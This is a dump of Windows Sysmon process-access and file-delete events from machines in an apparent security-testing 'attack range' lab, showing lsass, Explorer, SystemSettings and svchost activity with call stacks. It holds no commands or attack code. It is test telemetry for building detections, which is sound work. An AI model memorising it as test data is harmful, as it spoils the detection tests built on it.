12:22:48.979{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+7b2a6|C:\Windows\System32\SHELL32.dll+9b432|C:\Windows\System32\SHELL32.dll+2f463d|C:\Windows\System32\SHELL32.dll+2f06c9|C:\Windows\System32\SystemSettings.Handlers.dll+2cd2c|C:\Windows\System32\SystemSettings.Handlers.dll+2d9d4|C:\Windows\System32\SystemSettings.Handlers.dll+2d3fc|C:\Windows\System32\SystemSettings.Handlers.dll+2e194|C:\Windows\System32\SystemSettings.Handlers.dll+2c1b8|C:\Windows\System32\SystemSettings.Handlers.dll+baa0|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1859a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+16075|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1935a|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+2faf3|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+edb2a|C:\Windows\System32\Windows.UI.Xaml.dll+61284 10341000x800000000000000042979Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.979{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+7b2a6|C:\Windows\System32\SHELL32.dll+9b432|C:\Windows\System32\SHELL32.dll+2f463d|C:\Windows\System32\SHELL32.dll+2f06c9|C:\Windows\System32\SystemSettings.Handlers.dll+2cd2c|C:\Windows\System32\SystemSettings.Handlers.dll+2d9d4|C:\Windows\System32\SystemSettings.Handlers.dll+2d3fc|C:\Windows\System32\SystemSettings.Handlers.dll+2e194|C:\Windows\System32\SystemSettings.Handlers.dll+2c1b8|C:\Windows\System32\SystemSettings.Handlers.dll+baa0|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1859a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+16075|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1935a|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+2faf3|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+edb2a|C:\Windows\System32\Windows.UI.Xaml.dll+61284|C:\Windows\System32\Windows.UI.Xaml.dll+6116f 10341000x800000000000000042978Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.979{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042977Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.979{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042976Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.979{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7b35a|C:\Windows\System32\SHELL32.dll+9b432|C:\Windows\System32\SHELL32.dll+2f463d|C:\Windows\System32\SHELL32.dll+2f06c9|C:\Windows\System32\SystemSettings.Handlers.dll+2cd2c|C:\Windows\System32\SystemSettings.Handlers.dll+2d9d4|C:\Windows\System32\SystemSettings.Handlers.dll+2d3fc|C:\Windows\System32\SystemSettings.Handlers.dll+2e194|C:\Windows\System32\SystemSettings.Handlers.dll+2c1b8|C:\Windows\System32\SystemSettings.Handlers.dll+baa0|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1859a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+16075|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1935a|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+2faf3|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+edb2a|C:\Windows\System32\Windows.UI.Xaml.dll+61284|C:\Windows\System32\Windows.UI.Xaml.dll+6116f|C:\Windows\System32\Windows.UI.Xaml.dll+60f87|C:\Windows\System32\Windows.UI.Xaml.dll+60a74|C:\Windows\System32\Windows.UI.Xaml.dll+5ff39 10341000x800000000000000042975Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.979{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7b2c4|C:\Windows\System32\SHELL32.dll+9b432|C:\Windows\System32\SHELL32.dll+2f463d|C:\Windows\System32\SHELL32.dll+2f06c9|C:\Windows\System32\SystemSettings.Handlers.dll+2cd2c|C:\Windows\System32\SystemSettings.Handlers.dll+2d9d4|C:\Windows\System32\SystemSettings.Handlers.dll+2d3fc|C:\Windows\System32\SystemSettings.Handlers.dll+2e194|C:\Windows\System32\SystemSettings.Handlers.dll+2c1b8|C:\Windows\System32\SystemSettings.Handlers.dll+baa0|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1859a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+16075|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1935a|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+2faf3|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+edb2a|C:\Windows\System32\Windows.UI.Xaml.dll+61284|C:\Windows\System32\Windows.UI.Xaml.dll+6116f|C:\Windows\System32\Windows.UI.Xaml.dll+60f87|C:\Windows\System32\Windows.UI.Xaml.dll+60a74|C:\Windows\System32\Windows.UI.Xaml.dll+5ff39 10341000x800000000000000042974Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.979{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+7b2a6|C:\Windows\System32\SHELL32.dll+9b432|C:\Windows\System32\SHELL32.dll+2f463d|C:\Windows\System32\SHELL32.dll+2f06c9|C:\Windows\System32\SystemSettings.Handlers.dll+2cd2c|C:\Windows\System32\SystemSettings.Handlers.dll+2d9d4|C:\Windows\System32\SystemSettings.Handlers.dll+2d3fc|C:\Windows\System32\SystemSettings.Handlers.dll+2e194|C:\Windows\System32\SystemSettings.Handlers.dll+2c1b8|C:\Windows\System32\SystemSettings.Handlers.dll+baa0|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1859a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+16075|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1935a|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+2faf3|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+edb2a|C:\Windows\System32\Windows.UI.Xaml.dll+61284 10341000x800000000000000042973Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.979{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+7b2a6|C:\Windows\System32\SHELL32.dll+9b432|C:\Windows\System32\SHELL32.dll+2f463d|C:\Windows\System32\SHELL32.dll+2f06c9|C:\Windows\System32\SystemSettings.Handlers.dll+2cd2c|C:\Windows\System32\SystemSettings.Handlers.dll+2d9d4|C:\Windows\System32\SystemSettings.Handlers.dll+2d3fc|C:\Windows\System32\SystemSettings.Handlers.dll+2e194|C:\Windows\System32\SystemSettings.Handlers.dll+2c1b8|C:\Windows\System32\SystemSettings.Handlers.dll+baa0|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1859a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+16075|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+1935a|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+2faf3|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+edb2a|C:\Windows\System32\Windows.UI.Xaml.dll+61284|C:\Windows\System32\Windows.UI.Xaml.dll+6116f 10341000x800000000000000042972Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.979{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042971Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.979{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000042970Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.678{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\surveyor-20230118113739-044MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042969Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:48.325{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02598915BBF5332F9C8BDE02EF0A999F,SHA256=09D41EC1A1FD1B15E879D730A08EE9A5ADE230F8C3FDA8DD7183E535EB78435C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016733Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:48.138{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71CF56C1C746934F302D5EA7ADE20112,SHA256=59E72BB559EE3D961854ABE4698B0181D3F71724CE2B222BB607C1D7B6A17986,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043036Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.779{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AC3EA9987F43D77160A71336714A560,SHA256=5C38F4269F96B664D4A763B8F7480B49454A2C20093BD78E6945FB7E16B333BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043035Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.742{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=697EC1F0A75FD2FA8EF9277887962DD0,SHA256=B9B264B53AFC4EB3A785741614577F0CA61911EA15AFBC13267C13EBD2B43671,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043034Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.695{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000016734Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:49.223{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F01FF810F2905A19E2521CC3882FB254,SHA256=CA511FC27989613DAD00EBC6B7D01938B878D187AFDF54170B48808CB1C61063,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000043033Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.695{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043032Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.695{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043031Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.695{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043030Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.695{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043029Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.679{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043028Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.679{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043027Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.679{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043026Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 